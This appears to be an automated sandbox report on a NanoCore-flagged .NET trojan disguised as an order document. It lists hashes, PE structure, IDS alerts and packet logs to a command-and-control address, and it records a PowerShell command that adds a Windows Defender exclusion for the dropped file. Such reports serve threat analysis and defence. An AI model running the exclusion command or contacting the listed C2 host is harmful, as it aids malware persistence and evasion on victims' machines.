                      MD5:B31D920EEB8EE60422F11E5502682C2D
                      SHA1:462C3BC549115DD38E47A26E1C7CEC05E57C46DF
                      SHA-256:EBDDFEE32AC4653F7D04B6ECA36895358930EE4540BDD228B033CA1C5D582449
                      SHA-512:B12784998A80E148D9AA731596F68A2D3075766695473419D6157AF313D7C545B4EBA20E35D17A4134EDA0A64C1D55C49FD62B005472EC1C98ACB7738B0718B9
                      Malicious:false
                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210720081405..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 226546 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe..Process ID: 2416..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210720081405..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe..**********************..Windows PowerShell transcript start..Start time: 20210720082127..Username: computer\user..RunAs User: computer\ha

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):7.60637440768652
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      • Win32 Executable (generic) a (10002005/4) 49.75%
                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                      • Windows Screen Saver (13104/52) 0.07%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      File name:#RFQ ORDER7678432213211.exe
                      File size:1084928
                      MD5:2f286cd817b368e8a747e8f0d8f28825
                      SHA1:e49beec02d942e12b0dad74d81ab8ed4f02667e2
                      SHA256:b291d719522053a662cadd70b131668a1d953d4c4dd648e8a5647b689eb6341d
                      SHA512:3347116d44099808d4bbc050bc45c6b207adc8c75e2bcfdfc49d3d535328c9ddeebc0ded194b0c99e2f4ef021e1cfca221f6f09eef7fa77322e103671a4009cc
                      SSDEEP:24576:JU3ej57dEAKrvDBhGw4S3hYA0abY7VZ6Iyvv9JQ0NGNPV:ZALX3x0TrS7V
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5................P.............&.... ........@.. ....................................@................................

                      File Icon

                      Icon Hash:00828e8e8686b000

                      Static PE Info

                      General

                      Entrypoint:0x50a426
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Time Stamp:0x920335CE [Sat Aug 17 19:45:18 2047 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:v4.0.30319
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                      Entrypoint Preview

                      Instruction
                      jmp dword ptr [00402000h]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x10a3d40x4f.text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x10c0000x3d0.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x10e0000xc.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x10a3b80x1c.text
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x20000x10842c0x108600False0.76640070922data7.61140570465IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      .rsrc0x10c0000x3d00x400False0.38671875data3.0404823065IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x10e0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountry
                      RT_VERSION0x10c0580x374data

                      Imports

                      DLLImport
                      mscoree.dll_CorExeMain

                      Version Infos

                      DescriptionData
                      Translation0x0000 0x04b0
                      LegalCopyrightCopyright 2019
                      Assembly Version1.0.0.0
                      InternalNameSafeTypeNameParserHand.exe
                      FileVersion1.0.0.0
                      CompanyName
                      LegalTrademarks
                      Comments
                      ProductNameControlVehicular
                      ProductVersion1.0.0.0
                      FileDescriptionControlVehicular
                      OriginalFilenameSafeTypeNameParserHand.exe

                      Network Behavior

                      Snort IDS Alerts

                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      07/20/21-08:13:47.111506TCP2025019ET TROJAN Possible NanoCore C2 60B497261604192.168.2.3194.5.98.120
                      07/20/21-08:13:54.987776TCP2025019ET TROJAN Possible NanoCore C2 60B497291604192.168.2.3194.5.98.120
                      07/20/21-08:14:01.086640TCP2025019ET TROJAN Possible NanoCore C2 60B497301604192.168.2.3194.5.98.120
                      07/20/21-08:14:08.165157TCP2025019ET TROJAN Possible NanoCore C2 60B497311604192.168.2.3194.5.98.120
                      07/20/21-08:14:15.206346TCP2025019ET TROJAN Possible NanoCore C2 60B497351604192.168.2.3194.5.98.120
                      07/20/21-08:14:22.219133TCP2025019ET TROJAN Possible NanoCore C2 60B497371604192.168.2.3194.5.98.120
                      07/20/21-08:14:29.166940TCP2025019ET TROJAN Possible NanoCore C2 60B497381604192.168.2.3194.5.98.120
                      07/20/21-08:14:35.243747TCP2025019ET TROJAN Possible NanoCore C2 60B497391604192.168.2.3194.5.98.120
                      07/20/21-08:14:41.426450TCP2025019ET TROJAN Possible NanoCore C2 60B497401604192.168.2.3194.5.98.120
                      07/20/21-08:14:48.432412TCP2025019ET TROJAN Possible NanoCore C2 60B497421604192.168.2.3194.5.98.120
                      07/20/21-08:14:54.599567TCP2025019ET TROJAN Possible NanoCore C2 60B497441604192.168.2.3194.5.98.120
                      07/20/21-08:15:01.610024TCP2025019ET TROJAN Possible NanoCore C2 60B497451604192.168.2.3194.5.98.120
                      07/20/21-08:15:07.891700TCP2025019ET TROJAN Possible NanoCore C2 60B497461604192.168.2.3194.5.98.120

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jul 20, 2021 08:13:46.636729002 CEST497261604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:46.898874998 CEST160449726194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:46.901025057 CEST497261604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:47.111505985 CEST497261604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:47.418116093 CEST160449726194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:47.418675900 CEST497261604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:47.828103065 CEST160449726194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:47.829560995 CEST497261604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:48.107891083 CEST160449726194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:48.156677961 CEST497261604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:48.628135920 CEST160449726194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:48.628164053 CEST160449726194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:48.628176928 CEST160449726194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:48.628340006 CEST497261604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:48.678013086 CEST160449726194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:48.678124905 CEST497261604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:48.688198090 CEST160449726194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:48.688290119 CEST497261604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:48.938283920 CEST160449726194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:48.960274935 CEST160449726194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:48.960378885 CEST497261604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:48.967890978 CEST160449726194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:48.970683098 CEST497261604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:49.407893896 CEST160449726194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:49.408169031 CEST497261604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:49.430064917 CEST497261604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:49.430114031 CEST160449726194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:49.430361986 CEST497261604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:49.437948942 CEST160449726194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:49.438034058 CEST497261604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:49.478136063 CEST160449726194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:49.478475094 CEST497261604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:49.488229990 CEST160449726194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:49.488353968 CEST497261604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:49.501713037 CEST160449726194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:49.501874924 CEST497261604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:49.677902937 CEST160449726194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:49.678082943 CEST497261604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:54.651104927 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:54.986769915 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:54.987003088 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:54.987776041 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:55.284248114 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:55.284641981 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:55.644390106 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:55.684866905 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:55.692426920 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:56.004487991 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.004580021 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:56.086955070 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.087229967 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:56.116981983 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.117130041 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:56.137751102 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.137885094 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:56.156913996 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.157010078 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:56.316709995 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.370667934 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.389620066 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.391988039 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:56.406949043 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.427565098 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.432149887 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:56.447618008 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.466922998 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.469206095 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:56.487221956 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.507088900 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.507332087 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:56.687036037 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.706937075 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.707009077 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:56.726973057 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.737138033 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.737695932 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:56.757050991 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.767266035 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.767354965 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:56.787292957 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.797137022 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.797246933 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:56.807151079 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.810354948 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:56.857215881 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.857330084 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:56.857348919 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.857407093 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:56.857424021 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.857471943 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.857507944 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:56.857568026 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:56.887135983 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.887207985 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:56.907181978 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.907212973 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.907304049 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:56.967045069 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.967181921 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:56.977067947 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.977199078 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:56.987195015 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.987274885 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:56.997169971 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:56.998384953 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:57.007055998 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:57.010217905 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:57.017004013 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:57.017157078 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:57.027019978 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:57.029849052 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:57.037134886 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:57.037162066 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:57.037230015 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:57.037286043 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:57.047080040 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:57.047260046 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:57.057143927 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:57.057277918 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:57.067084074 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:57.068705082 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:57.077263117 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:57.077353954 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:57.087182045 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:57.087413073 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:57.097090006 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:57.097223043 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:13:57.106853962 CEST160449729194.5.98.120192.168.2.3
                      Jul 20, 2021 08:13:57.107141972 CEST497291604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:00.827428102 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:01.085069895 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:01.086085081 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:01.086639881 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:01.354435921 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:01.357558012 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:01.606825113 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:01.608822107 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:02.046850920 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.047143936 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:02.077034950 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.077142954 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:02.107903004 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.108066082 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:02.117047071 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.120204926 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:02.137178898 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.137265921 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:02.336954117 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.356865883 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.356997013 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:02.376930952 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.386900902 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.387078047 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:02.426868916 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.427218914 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:02.446813107 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.447594881 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:02.456882954 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.456973076 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:02.627011061 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.627183914 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:02.788430929 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.788858891 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:02.813213110 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:02.836849928 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.836936951 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:02.876806974 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.876935959 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:02.896884918 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.897010088 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:02.916785955 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.919871092 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:02.937345982 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.937472105 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:02.946805000 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.946887016 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:02.967571020 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.972047091 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:02.977423906 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.977513075 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:02.997502089 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.999906063 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.376781940 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.376967907 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.404556036 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.416754007 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.419950008 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.436793089 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.437411070 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.456885099 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.457020998 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.476850033 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.479254007 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.498061895 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.498558998 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.506839037 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.507006884 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.517138958 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.518496037 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.527152061 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.527282000 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.807990074 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.842463017 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.917412996 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.917650938 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.936991930 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.937195063 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.957494020 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.957596064 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.979510069 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.979567051 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.986865044 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.987045050 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:04.007478952 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:04.007622957 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:04.017139912 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:04.017245054 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:04.027070999 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:04.027165890 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:07.890778065 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:08.164105892 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:08.164516926 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:08.165157080 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:08.434273958 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:08.435486078 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:08.714288950 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:08.764091969 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:08.838645935 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:09.134315968 CEST160449731194.5.98.120192.168.2.3
